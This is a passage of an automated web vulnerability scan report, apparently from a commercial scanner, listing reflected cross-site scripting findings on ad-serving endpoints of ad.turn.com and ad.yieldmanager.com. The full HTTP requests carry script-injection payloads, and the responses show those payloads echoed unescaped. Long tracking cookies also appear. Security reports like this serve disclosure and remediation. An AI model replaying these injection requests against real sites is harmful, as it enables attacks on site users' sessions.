The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adcb3"><script>alert(1)</script>b1542407aad was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=adcb3"><script>alert(1)</script>b1542407aad&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Mon, 07-Nov-2011 14:59:53 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 11 May 2011 14:59:53 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=7608090676191050633&fpid=adcb3"><script>alert(1)</script>b1542407aad&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.93. http://ad.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 939c8"><script>alert(1)</script>ef8c3acda6c was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1&sp=939c8"><script>alert(1)</script>ef8c3acda6c HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Mon, 07-Nov-2011 15:00:02 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:00:02 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8639748840003986038&fpid=1&nu=n&t=&sp=939c8"><script>alert(1)</script>ef8c3acda6c&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.94. http://ad.yieldmanager.com/getbid [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /getbid

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload bc01c<script>alert(1)</script>9c8a0fe4eae was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /getbid?Z=300x250&s=796244&_salt={SDC_RND}&r=1&callback=C1Qs4Xi5Px9F.b3Ul4Yp5Rb9Vbc01c<script>alert(1)</script>9c8a0fe4eae&cookie=1&flash=1&bvs=&hvs=BBJRMUOOP&u=http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=7681b4f5-7a3b-407a-961f-c43e051f5d06&sz=300x250&neg=&ega=&puid=&rnd=9947336
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; ih="b!!!!N!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!$<xl/w!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9"; pv1="b!!!!@!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,x.^!$Rao!,+V>!$%hK!%lRH!!?5%$q316!wVd.!%vQM!%Oo9!$hK:~~~~~=!$Yk=!>RfM.jTN!!L7_!,x.^!$Rao!,+V>!$%hK!%lRH!!?5%$q316!wVd.!%vQM!%Oo9!$hK:~~~~~=!$Yk=##A-M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wjV!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!%17!!!#G!#wjW!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!'0u!!!#G!#wjX!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!(]!!!!#G!#wjY!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!+[-!!!#G!#wjZ!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!1YB!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra
[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~"; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp_Z5lxm/ZqKvPS6f; 
bh="b!!!%(!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!+=!$MK!!0O<!!!!3=!$MK!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!1=!$MK!!J<E!!!!1=!$MK!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!2=!$MK!!q:E!!!!/=!$MK!!q<+!!!!0=!$MK!!q</!!!!0=!$MK!!q<3!!!!0=!$MK!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!,<yq][!!ucq!!!!3=!$MK!!vRm!!!!+=!$MK!!vRq!!!!+=!$MK!!vRr!!!!+=!$MK!!vRw!!!!3=!$MK!!vRx!!!!+=!$MK!!vRy!!!!+=!$MK!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!+=!$MK!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!+=!$MM!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!+=!$MK!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!+=!$MK!#6hK!!!!#=!27c!#7.'!!!!+=!$MK!#7.:!!!!+=!$MK!#7.O!!!!+=!$MK!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!+=!$MK!#MTF!!!!+=!$MK!#MTH!!!!+=!$MK!#MTI!!!!+=!$MK!#MTJ!!!!+=!$MK!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!1=!$MK!#SF3!!!!1=!$MK!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!+=!$MK!#UDP!!!!1=!$MK!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%
<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!+=!$MK!#ai7!!!!+=!$MK!#ai?!!!!+=!$MK!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!+=!$MK!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!+=!$MK!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!+=!$MK!#tM)!!!!+=!$MK!#tn2!!!!+=!$MK!#uE=!!!!#<x9#K!#uJY!!!!1=!$MK!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!+=!$MK!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!.=!$MK!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!+=!$MK!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!+=!$MK!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!.=!$MK!$(S9!!!!*<yq][!$(Tb!!!!#<yQLc!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq]["; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:21:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0151.rm.bf1
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Wed, 11 May 2011 15:21:37 GMT
Pragma: no-cache
Content-Length: 573
Content-Type: text/html
Age: 0
Proxy-Connection: close

C1Qs4Xi5Px9F.b3Ul4Yp5Rb9Vbc01c<script>alert(1)</script>9c8a0fe4eae={"result":{"cpm":73710,"type":3,"ad":"http://ad.yieldmanager.com/getserved?T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEAAAIAAAAAABAAAgAEC2FsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
...[SNIP]...

5.95. http://ad.yieldmanager.com/getbid [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /getbid

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload c4fa8<script>alert(1)</script>39e3c2a31b0 was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /getbid?Z=300x250&s=796244&_salt={SDC_RND}&r=1&callback=C1Qs4Xi5Px9F.b3Ul4Yp5Rb9V&cookie=1&flash=1&bvs=&hvs=BBJRMUOOP&u=http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2Fc4fa8<script>alert(1)</script>39e3c2a31b0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=7681b4f5-7a3b-407a-961f-c43e051f5d06&sz=300x250&neg=&ega=&puid=&rnd=9947336
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; ih="b!!!!N!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!$<xl/w!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9"; pv1="b!!!!@!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,x.^!$Rao!,+V>!$%hK!%lRH!!?5%$q316!wVd.!%vQM!%Oo9!$hK:~~~~~=!$Yk=!>RfM.jTN!!L7_!,x.^!$Rao!,+V>!$%hK!%lRH!!?5%$q316!wVd.!%vQM!%Oo9!$hK:~~~~~=!$Yk=##A-M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wjV!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!%17!!!#G!#wjW!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!'0u!!!#G!#wjX!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!(]!!!!#G!#wjY!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!+[-!!!#G!#wjZ!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!1YB!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra
[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~"; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp_Z5lxm/ZqKvPS6f; 
bh="b!!!%(!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!+=!$MK!!0O<!!!!3=!$MK!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!1=!$MK!!J<E!!!!1=!$MK!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!2=!$MK!!q:E!!!!/=!$MK!!q<+!!!!0=!$MK!!q</!!!!0=!$MK!!q<3!!!!0=!$MK!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!,<yq][!!ucq!!!!3=!$MK!!vRm!!!!+=!$MK!!vRq!!!!+=!$MK!!vRr!!!!+=!$MK!!vRw!!!!3=!$MK!!vRx!!!!+=!$MK!!vRy!!!!+=!$MK!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!+=!$MK!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!+=!$MM!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!+=!$MK!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!+=!$MK!#6hK!!!!#=!27c!#7.'!!!!+=!$MK!#7.:!!!!+=!$MK!#7